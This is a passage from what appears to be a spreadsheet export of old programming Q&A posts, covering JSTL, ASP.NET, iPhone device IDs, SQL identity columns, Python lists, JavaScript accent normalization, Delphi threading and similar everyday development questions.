&lt;pre&gt;&lt;code&gt;&amp;lt;jsp:useBean id="pageBean" scope="request" type="com.epicentric.page.website.PageBean" /&amp;gt;
&amp;lt;c:set var="pageDividers" value="&amp;lt;%= pageBean.getPageDividers() %&amp;gt;" /&amp;gt;
&amp;lt;c:set var="numColumns" value="${pageDividers.size()}" /&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The variable &lt;code&gt;pageDividers&lt;/code&gt; is a &lt;code&gt;List&lt;/code&gt; object.&lt;/p&gt;
&lt;p&gt;I'm encountering this issue: when I ask for &lt;code&gt;pageDivider&lt;/code&gt;'s size, an exception is thrown. I know this is a simple JTSL error -- what am I doing wrong?&lt;/p&gt;
&lt;p&gt;The error message is:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;The function size must be used with a prefix when a default namespace is not specified&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;How do I correctly access or call the methods of my &lt;code&gt;pageDividers&lt;/code&gt; object?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to Dynamically add menu items to master page in ASP.NET 3.5 MVC app</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to dynamically add menuitems to my master page based on membership security login role. From what I've read RenderAction in the master page html could perhaps do this. Since I'm fumbling thru this I am not sure how it would look and how in the controller I check my current role. I am considering creating a table and relating the allowable menu items to role relationship so I can pass to the master page for rendering the dynamic menu items. Any suggestions answers or comments appreciated. Thanks - Mike&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Unique identifier for an iPhone app</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;For an iPhone app that submits images to a server I need somehow to tie all the images from a particular phone together.  With every submit I'd like to send some unique phone id.  Looked at &lt;pre&gt;
  [[UIDevice mainDevice] uniqueIdentifier]&lt;br /&gt;
and
  [[NSUserDefaults standardDefaults] stringForKey:@"SBFormattedPhoneNumber"]
&lt;/pre&gt;&lt;/p&gt;
&lt;p&gt;but getting errors in the simulator.&lt;/p&gt;
&lt;p&gt;Is there an Apple sanctioned way of doing this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Question about skipping IDs in an identity column in MSSQL</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Say I have an MSSQL table with two columns:  an int ID column that's the identity column and some other datetime or whatever column.  Say the table has 10 records with IDs 1-10.  Now I delete the record with ID = 5.&lt;/p&gt;
&lt;p&gt;Are there any scenarios where another record will "fill-in" that missing ID?  I.e. when would a record be inserted and given an ID of 5?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Apart from initial cost, are there any other benefits of using MySQL over MSQL server with .net?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've used both and I've found MySql to have several frustrating bugs, limited support for: IDE integration, profiling, integration services, reporting, and even lack of a decent manager. Total cost of ownership of MSSQL Server is touted to be less than MySQL too (.net environment), but maintaining an open mind could someone point out any killer features of MySql?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Passing a list while retaining the original</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;So I'm teaching myself Python, and I'm having an issue with lists. I want to pass my function a list and pop items off it while retaining the original list. How do I make python "instance" the passed list rather that passing a pointer to the original one?&lt;/p&gt;
&lt;p&gt;Example:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;def burninate(b):
    c = []
    for i in range(3):
    	c.append(b.pop())
    return c
a = range(6)
d = burninate(a)
print a, d
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Output: [0, 1, 2] [5, 4, 3]&lt;br&gt;
Desired output: [0, 1, 2, 3, 4, 5] [5, 4, 3]&lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why is it bad to use an iteration variable in a lambda expression</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I was just writing some quick code and noticed this complier error &lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;Using the iteration variable in a lambda expression may have unexpected results.&lt;br&gt;
  Instead, create a local variable within the loop and assign it the value of the iteration variable.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I know what it means and I can easily fix it, not a big deal.&lt;br&gt;
But I was wondering why it is a bad idea to use a iteration variable  in a lambda?&lt;br&gt;
What problems can I cause later on?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Programatic Accent Reduction in JavaScript (aka text normalization or unaccenting)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to compare 2 strings as equal such as these:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;Lubeck == LÃ¼beck&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;In JavaScript.&lt;/p&gt;
&lt;p&gt;Why? Well, I have an auto-completion field that's going out to a Java service using Lucene, where place names are stored naturally (as LÃ¼beck), but also indexed as normalized text, &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;import sun.text.Normalizer;
oDoc.setNameLC = Normalizer.normalize(oLocName, Normalizer.DECOMP, 0)
    .toLowerCase().replaceAll("[^\\p{ASCII}]","");
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This way some-one who doesn't know to type "MÃ¨xico" can type "mexico" and get a match which returns "MÃ¨xico" (among a lot of other possible hits, like "CafÃ© MÃ¨xico, Dubai, UAE").&lt;/p&gt;
&lt;p&gt;Now the thing is I don't have the ability to change the service to do any highlighting on the server side, therefore I am highlighting on the client JavaScript side with something like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;return result.replace( input.replace(/[aeiou]/g,"."), "&amp;lt;b&amp;gt;$1&amp;lt;/b&amp;gt;");
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;It's a little more fancy because I am escaping special regex characters in the input. This is fine for simple one word matches at the beginning of a hit, but it really breaks down if you suddenly wish to support multi-word matches like "london cafe":&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;input = input.strip().toLowerCase(); //fyi prototype's strip is like trim
re = new RegEx(input.replace(/[aeiou]/g,".").replace(/\s+/g,"|"),"gi");
return result.replace(re, "&amp;lt;b&amp;gt;$1&amp;lt;/b&amp;gt;");
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This doesn't work for say "london ca" (was typing london cafe), because it would mark "Jack London Cabin, Dawson City, Canada" as: &lt;code&gt;"Ja&amp;lt;b&amp;gt;ck&amp;lt;/b&amp;gt; &amp;lt;b&amp;gt;London&amp;lt;/b&amp;gt; &amp;lt;b&amp;gt;ca&amp;lt;/b&amp;gt;bin, Dawson &amp;lt;b&amp;gt;Ci&amp;lt;/b&amp;gt;ty, &amp;lt;b&amp;gt;Ca&amp;lt;b/&amp;gt;nada"&lt;/code&gt; [note the "ck" and "Ci" particularly]&lt;/p&gt;
&lt;p&gt;Therefore I'm sort of looking for something that's not as crazy as:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;input = input.strip().toLowerCase();
input = input.replace(/a/g,"[Ã€Ã ÃÃ¡Ã‚Ã¢ÃƒÃ£Ã„Ã¤Ã…Ã¥Ã†Ã¦Ä€ÄÄ‚ÄƒÄ„Ä…]");
input = input.replace(/e/g,"[ÃˆÃ¨Ã‰Ã©ÃŠÃªÃ‹Ã«Ä’Ä“Ä”Ä•Ä–Ä—Ä˜Ä™ÄšÄ›]");
// ditto for i, o, u, y, c, n, maybe also d, g, h, j, k, l, r, s, t, w, z 
re = new RegEx(input.replace(/\s+/g,"|"),"gi");
return result.replace(re, "&amp;lt;b&amp;gt;$1&amp;lt;/b&amp;gt;");
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Is there a compiled table I can refer to mapping a range of characters which are accented versions of an other character to that character, by which I don't mean the plain unicode chart. And if so, could I avoid using weird, possibly slow, RegEx statements?&lt;/p&gt;
&lt;p&gt;&lt;em&gt;About the bounty:&lt;/em&gt;&lt;br /&gt;
Before I started a bounty there were two answers, the one pointing me to doing it in Ruby, and &lt;a href="http://stackoverflow.com/questions/227950/programatic-accent-reduction-in-javascript-aka-text-normalization-or-unaccenting/228006#228006"&gt;the one&lt;/a&gt; that &lt;a href="http://stackoverflow.com/users/22364/mizardx"&gt;MizzardX&lt;/a&gt; wrote which was a completion of the basic form I'd put in my question. Now don't get me wrong, I really appreciate working it out as completely as he did, but I just wished that there might be another way.  It seems so far that everyone who's dropped by to look at the question and answer has decided that MizzardX covers it just fine, or that they have no different approach. I would be interested in a different approach, and if it simply isn't available before the bounty closes, MizzardX will win the bounty (though in a cruel twist, his edits mad it a community wiki answer, so I'm not sure if he'll get the bounty!)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Merge Facts from Different Sources? Or Load Separately?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We've got data with two different origins:  some comes from a customer, some comes from different vendors.  Currently, we physically "merge" this data into a massive table with almost a hundred columns, tens of thousands of rows and no formal separation of the two dimensions.  Consequently, we can't actually use this table for much.  &lt;/p&gt;
&lt;p&gt;I'm going to redesign this mess into a proper, but small, star schema.  &lt;/p&gt;
&lt;p&gt;The two dimensions are obvious.  One of them, for example, is time.  &lt;/p&gt;
&lt;p&gt;The customer-supplied data provides a number of fact values.  Each vendor may (or may not) provide additional fact values that fit the same dimensions.&lt;/p&gt;
&lt;p&gt;This fact data all has the same granularity.  It can be called "sparse" because we don't often get information from all vendors.&lt;/p&gt;
&lt;p&gt;Here's my dilemma.&lt;/p&gt;
&lt;p&gt;Is this one fact table -- with some nulls -- populated from different sources?&lt;/p&gt;
&lt;p&gt;Or is this &lt;em&gt;n&lt;/em&gt;+1 fact tables -- one populated from the customer, the others populated from each vendor?&lt;/p&gt;
&lt;p&gt;There are pros and cons to each design.  I need some second opinions on the choice between "merge" or "load separately".&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;Customer supplies revenue, cost, counts, weights, and other things they know about their end of a transaction.&lt;/p&gt;
&lt;p&gt;Vendor one supplies some additional details about some of the transactions -- weights, costs, durations.  The other transactions will have no value from vendor one.&lt;/p&gt;
&lt;p&gt;Vendor two supplies some additional details about some of the transactions -- volumes, durations, lengths, foreign currency rates.  The other transactions will have no value for vendor two.&lt;/p&gt;
&lt;p&gt;Some transactions will have both vendors.  A few transactions will have neither vendor.&lt;/p&gt;
&lt;p&gt;One table with nulls?  Three tables?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Custom URI for HTTPListener?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a way to add a custom prefix/URI that is not http or https? The HTTPListener.Prefixes.Add method only accepts http:// and https:// prefixes.&lt;/p&gt;
&lt;p&gt;I just don't want to recreate the functionality of this class if I don't have to. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why is there not a register that contains the higher bytes of EAX?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;&lt;code&gt;%AX = (%AH + %AL)&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;So why not &lt;code&gt;%EAX = (%SOME_RESTIER + %AX)&lt;/code&gt; for some register &lt;code&gt;%SOME_REGISTER&lt;/code&gt;? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>RegEx teaser</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Let's say we have 2 php variables:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;$name&lt;/strong&gt; = 'caption';&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;$url&lt;/strong&gt; = '&lt;a href="http://domain.com/photo.jpg" rel="nofollow"&gt;http://domain.com/photo.jpg&lt;/a&gt;';&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The input string of &lt;code&gt;'{@url,&amp;lt;img src="," alt="{@name}" /&amp;gt;}'&lt;/code&gt; should return:&lt;/p&gt;
&lt;p&gt;&lt;code&gt;'&amp;lt;img src="http://domain.com/photo.jpg" alt="caption" /&amp;gt;'&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;The &lt;code&gt;{tag}&lt;/code&gt; takes up to 3 parameters: &lt;code&gt;{@variable[,text_before][,text_after]}&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;What regex would be needed to make this happen? The tricky part is that a &lt;code&gt;{@..}&lt;/code&gt; tag is nested within another.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Removing file locks</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to recover form an error case where a file gets left in a locked state.  How can I in c# tell this file to reset it's locks? I need to add to this the file is opened by a 3rd party dll and I don't actually have access to the file handle.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Looking for alternatives or improvements to drop down lists/menus on websites</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Drop-down lists, menus and combo boxes are all very common user interface elements. Users are accustomed to seeing these elements in native applications and sometimes web apps, but there are a few problems with them. &lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;p&gt;You have to aim the mouse. Some menus collapse when you mouse out, and some have submenus that you have to aim at to expand.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;You can't see the options without aiming the mouse first.&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;These are the main things that trouble me, maybe other people notice other issues as well. I normally don't use drop-down menus at all if I can help it.&lt;/p&gt;
&lt;p&gt;The problem is that I sometimes want to present a long list of options in limited space. Issue 2 is a sacrifice I'm willing to make, but I'm wanting to know if anyone has any tricks to make these drop menus easier to use. Maybe someone has invented a new style of list control.&lt;/p&gt;
&lt;p&gt;I'm sure that if these types of controls annoy me, then they annoy users of my site more.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the best method for getting a database connection/object into a function in PHP?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;A couple of the options are:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$connection = {my db connection/object};
function PassedIn($connection) { ... }
function PassedByReference(&amp;amp;$connection) { ... }
function UsingGlobal() {
    global $connection;
    ...
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;So, passed in, passed by reference, or using global. I'm thinking in functions that are only used within 1 project that will only have 1 database connection. If there are multiple connections, the definitely passed in or passed by reference.&lt;/p&gt;
&lt;p&gt;I'm thining passed by reference is not needed when you are in PHP5 using an object, so then passed in or using global are the 2 possibilities.&lt;/p&gt;
&lt;p&gt;The reason I'm asking is because I'm getting tired of always putting in $connection into my function parameters.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Garbage Collection in C++ -- why?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I keep hearing people complaining that C++ doesn't have garbage collection. I also hear that the C++ Standards Committee is looking at adding it to the language. I'm afraid I just don't see the point to it... using RAII with smart pointers eliminates the need for it, right?&lt;/p&gt;
&lt;p&gt;My only experience with garbage collection was on a couple of cheap eighties home computers, where it meant that the system would freeze up for a few seconds every so often. I'm sure it has improved since then, but as you can guess, that didn't leave me with a high opinion of it.&lt;/p&gt;
&lt;p&gt;What advantages could garbage collection offer an experienced C++ developer?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to Load More than 1 CSV File at a Time Via Excel VBA?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;how does one import CSV files via Excel VBA in a set, in groups or in multiple individual files, rather than one at a time?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I iterate through a string in Python?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;As an example, lets say I wanted to list the frequency of each letter of the alphabet in a string. What would be the easiest way to do it?&lt;/p&gt;
&lt;p&gt;This is an example of what I'm thinking of... the question is how to make allTheLetters equal to said letters without something like allTheLetters = "abcdefg...xyz". In many other languages I could just do letter++ and increment my way through the alphabet, but thus far I haven't come across a way to do that in python.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;def alphCount(text):
  lowerText = text.lower()
  for letter in allTheLetters:  
    print letter + ":", lowertext.count(letter)
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Application_Start works fine on workstation, is not called when deployed</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have an application that works great on my development workstation but fails when the application is deployed to the live environment.  It seems that Application_Start is not being called in the live environment.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>jQuery resize not working at FireFox, Chrome and Safari</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;pre&gt;&lt;code&gt;$("#dvMyDIV").bind("resize", function(){
    alert("Resized");
});
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;or&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$("#dvMyDIV").resize(function(){
    alert("Resized");
});
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The questions&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Why is this not working at FireFox, Chrome and Safari?&lt;/li&gt;
&lt;li&gt;Can this be considered a jQuery bug since the resize is not handled for other browsers?&lt;/li&gt;
&lt;li&gt;Could the only workaround be calling a SetTimeout function checking the clientHeight and clientWidth?&lt;/li&gt;
&lt;li&gt;Any workarounds using jQuery?&lt;/li&gt;
&lt;/ol&gt;
</t>
  </si>
  <si>
    <t>Class methods as event handlers in JavaScript?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a best-practice or common way in JavaScript to have class members as event handlers?&lt;/p&gt;
&lt;p&gt;Consider the following simple example:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;head&amp;gt;
    &amp;lt;script language="javascript" type="text/javascript"&amp;gt;
        ClickCounter = function(buttonId) {
            this._clickCount = 0;
            document.getElementById(buttonId).onclick = this.buttonClicked;
        }
        ClickCounter.prototype = {
            buttonClicked: function() {
                this._clickCount++;
                alert('the button was clicked ' + this._clickCount + ' times');
            }
        }
    &amp;lt;/script&amp;gt;
&amp;lt;/head&amp;gt;
&amp;lt;body&amp;gt;
    &amp;lt;input type="button" id="btn1" value="Click me" /&amp;gt;
    &amp;lt;script language="javascript" type="text/javascript"&amp;gt;
        var btn1counter = new ClickCounter('btn1');
    &amp;lt;/script&amp;gt;
&amp;lt;/body&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The event handler buttonClicked gets called, but the _clickCount member is inaccessible, or &lt;em&gt;this&lt;/em&gt; points to some other object.&lt;/p&gt;
&lt;p&gt;Any good tips/articles/resources about this kind of problems?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Apache MOD_REWRITE Domain Level Cookie</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to deal with Affiliate Tracking on our website.&lt;/p&gt;
&lt;p&gt;In our .htaccess we have:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;RewriteCond %{QUERY_STRING} affiliate=(.*)
RewriteRule ^(.*)$ $1?  [NC,R,L,co=AFFID:%1:%{HTTP:Host}:7200:/]
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Which creates a COOKIE called AFFID with the value of the URL Parameter affiliate.&lt;/p&gt;
&lt;p&gt;But the Cookie is not for the whole domain, i.e. Going to &lt;a href="http://www.domain.com/?affiliate=bmk" rel="nofollow"&gt;http://www.domain.com/?affiliate=bmk&lt;/a&gt; sets the AFFID cookie with the value bmk for .www.domain.com but I would like ti to be for .domain.com so that it can be used across our secure domain which will be secure.domain.com &lt;/p&gt;
&lt;p&gt;Any help would be appreciated &lt;/p&gt;
&lt;p&gt;Cheers&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to ignore whitespace while reading a file to produce an XML DOM</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to read a file to produce a DOM Document, but the file has whitespace and newlines and I'm trying to ignore them, but I couldn't:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;DocumentBuilderFactory docfactory=DocumentBuilderFactory.newInstance();
docfactory.setIgnoringElementContentWhitespace(true);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I see in Javadoc that setIgnoringElementContentWhitespace method operates only when the validating flag is enabled, but I haven't the DTD or XML Schema for the document.&lt;/p&gt;
&lt;p&gt;What can I do?&lt;/p&gt;
&lt;p&gt;Update&lt;/p&gt;
&lt;p&gt;I don't like the idea of introduce mySelf &amp;lt; !ELEMENT... declarations and i have tried the
solution proposed in the &lt;a href="http://forums.sun.com/thread.jspa?messageID=2054303#2699961" rel="nofollow"&gt;forum&lt;/a&gt; pointed by Tomalak, but it doesn't work, i have used java 1.6 in an linux environment. I think if no more is proposed i will make a few methods to ignore whitespace text nodes&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to refresh Internet Explorer using SendMessage?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;does anybody know how to refresh the Internet Explorer (like by pressingthe F5 key) but using some "backdoor" like PostMessage or SendMessage? The internet Explorer Window is not active so I can't use the keyboard.&lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
&lt;p&gt;(Language doesnt matter)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Delphi Multi-Threading Message Loop</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;My application has several threads:
1) Main Thread
2) 2 Sub-Main Threads (each with Message Loop, as shown below), used by TFQM
3) n Worker Threads (simple loop, containing Sleep())&lt;/p&gt;
&lt;p&gt;My problem is, when I close my application, the Worker Threads manage to exit properly, but 1 of the 2 Sub-Main Threads hangs (never exits) when I issue WM_QUIT to close them.&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;procedure ThreadProcFQM(P: Integer); stdcall;
var
  Msg: TMsg;
 _FQM: TFQM;
begin
  _FQM := Ptr(P);
  try
    _FQM.fHandle := AllocateHwnd(_FQM.WndProc);
    while GetMessage(Msg, 0, 0, 0) do
    begin
      TranslateMessage(Msg);
      DispatchMessage(Msg);
    end;
  finally
    DeallocateHWnd(_FQM.fHandle);
    SetEvent(_FQM.hTerminated);
  end;
end;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;procedure TFQM.Stop;
begin
  PostMessage(fHandle, WM_QUIT, 0, 0);
  WaitForSingleObject(hTerminated, INFINITE);
  if hThread &amp;lt;&amp;gt; INVALID_HANDLE_VALUE then
  begin
    CloseHandle(hThread);
    hThread := INVALID_HANDLE_VALUE;
  end;
end;
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>need PropertyGrid with drill-down, similar to QuickWatch</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to display object data members in a generic way.  I started by using PropertyGrid, which satisfies my needs as far as simple properties are concerned.  However, it doesn't let the user drill-down into data members.  It allows browsing into collections, but the interface is a bit awkward.&lt;/p&gt;
&lt;p&gt;I'm basically looking for something with the features of QuickWatch.  Does anybody know of any libraries that can do drill-down?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Timeouts WCF Services</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How do the timeouts work in WCF? I know for example that you can configure &lt;em&gt;sendTimeout&lt;/em&gt; and &lt;em&gt;receiveTimeout&lt;/em&gt; for a clients binding. But how do they work?&lt;/p&gt;
&lt;p&gt;MSDN describes &lt;em&gt;sendTimeout&lt;/em&gt; as:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;A TimeSpan value that specifies the interval of time provided for a
  send operation to complete. This value should be greater than or equal
  to Zero. The default is 00:01:00.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;What are send operations/receive operations?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>gridview dynamic image change in imagebutton</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a gridview containing some data from db, and after a check I want to see a small cross/tick image in each row, due to the result of the check.How can I change the image url dynamically? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Class design for serialization - ideas or patterns?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Let me begin with an illustrative example (assume the implementation is in a statically typed language such as Java or C#).&lt;/p&gt;
&lt;p&gt;Assume that you are building a content management system (CMS) or something similar. The data is hierarchically organised into &lt;code&gt;Folder&lt;/code&gt;s. Each folder has a collection of children; a child may be a &lt;code&gt;Page&lt;/code&gt; or a &lt;code&gt;Folder&lt;/code&gt;. All items are stored within a root folder. No cycles are allowed. We have an acyclic graph.&lt;/p&gt;
&lt;p&gt;The system will have a remote API and instances of &lt;code&gt;Folder&lt;/code&gt; and &lt;code&gt;Page&lt;/code&gt; must be serialized / de-serialized across the network. With a typical implementation of folder, in which a folder's children are a &lt;code&gt;List&lt;/code&gt;, serialization of the root node would send the entire graph. This is unacceptable for obvious reasons.&lt;/p&gt;
&lt;p&gt;I am interested to hear people have solved this problem in the past.&lt;/p&gt;
&lt;p&gt;I have two potential suggestions:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Navigation by query&lt;/strong&gt;: Change the domain model so that the folder class contains only a list of IDs for each child. To access a child we must query for it. Serialisation is now trivial since the graph ends at a well defined point. The major downside is that we lose type safety - the ID could be for something other than a folder/child.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Stop and re-attach&lt;/strong&gt;: During serialization stop whenever we detect a reference to a folder or page, send the ID instead. When de-serializing we must then look up the corresponding object for each ID and re-attach it at the relevant position in the nascent object.&lt;/li&gt;
&lt;/ol&gt;
</t>
  </si>
  <si>
    <t>New web app project does not recognize the &lt;asp: tag space</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Visual Studio 2008 w/Sp1&lt;/p&gt;
&lt;p&gt;To reproduce my problem I simply create a new .Net 2.0 web application and add a page with the following markup:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;%@ Page Language="C#" AutoEventWireup="true" CodeBehind="Default.aspx.cs" Inherits="WebApplication5._Default" %&amp;gt;
&amp;lt;!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"&amp;gt;
&amp;lt;html xmlns="http://www.w3.org/1999/xhtml" &amp;gt;
&amp;lt;head runat="server"&amp;gt;
    &amp;lt;title&amp;gt;&amp;lt;/title&amp;gt;
&amp;lt;/head&amp;gt;
&amp;lt;body&amp;gt;
    &amp;lt;form id="form1" runat="server"&amp;gt;
    &amp;lt;div&amp;gt;
        &amp;lt;asp:button id="button1" runat="server" /&amp;gt;
    &amp;lt;/div&amp;gt;
    &amp;lt;/form&amp;gt;
&amp;lt;/body&amp;gt;
&amp;lt;/html&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;what happens is that a line is drawn under :button with the statement "Validation (): Element 'button' is not supported."&lt;/p&gt;
&lt;p&gt;I've tried repairing the .net framework; however, that had no impact.  This started happening on two different machines, one is vista the other is XP within the past week.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;UPDATE:&lt;/strong&gt; I closed this question because after spending 2 days trying to fix it I gave up and performed a complete reinstall of Visual Studio 2008.  This resolved whatever was jacked up and now the machines in question work properly.  I upvoted each of you for the help.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Mysterious assets used in swf, not found anywhere in fla?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;near the top of the code i see things like, &lt;/p&gt;
&lt;p&gt;btn_dropdown._visible = false;
mcMenuBkg._visible = false;&lt;/p&gt;
&lt;p&gt;but I can't find these assets anywhere in the library or in any code, how does this make any sense?&lt;/p&gt;
&lt;p&gt;The movie clips in the library that look the same have different names and I can delete them entirely and they still show up when I compile and run, or I can add trace statements into their code and they never get called.&lt;/p&gt;
&lt;p&gt;where on earth are these assets defined?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>SelectedValue is invalid - doesn't exist in list - C#/ASP.NET</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Exception is: 
'Country' has a SelectedValue which is invalid because it does not exist in the list of items.
Parameter name: value&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;UserService.DsUserAttributes dsCountry = us_service.GetUserAttributeDropDown(systemId, "Country");
Country.DataSource = dsCountry.tblDropDownValues;
Country.DataTextField = "AttrValue";
Country.DataValueField = "Id";
Country.DataBind();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The values held within dsCountry.tblDropDownValues are:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Id                                      AttrValue       AttrName
aefa28e0-a118-11dd-ad8b-080c210c9a66    PLEASE SELECT	Country
213a743e-ea0b-419c-bd44-03b1c35241b3    USA	        Country
eefa1387-8dc0-11d8-975f-13da67a41a5d    CANADA	        Country
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>PHP syntax highlighting</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm searching for a &lt;strong&gt;PHP syntax highlighting engine&lt;/strong&gt; that can be customized (i.e. I can provide my &lt;strong&gt;own tokenizers&lt;/strong&gt; for new languages) and that can handle several languages &lt;em&gt;simultaneously&lt;/em&gt; (i.e. on the same output page). This engine has to work well together with &lt;strong&gt;CSS classes&lt;/strong&gt;, i.e. it should format the output by inserting &lt;code&gt;&amp;lt;span&amp;gt;&lt;/code&gt; elements that are adorned with &lt;code&gt;class&lt;/code&gt; attributes. Bonus points for an extensible schema.&lt;/p&gt;
&lt;p&gt;I do &lt;em&gt;not&lt;/em&gt; search for a client-side syntax highlighting script (JavaScript).&lt;/p&gt;
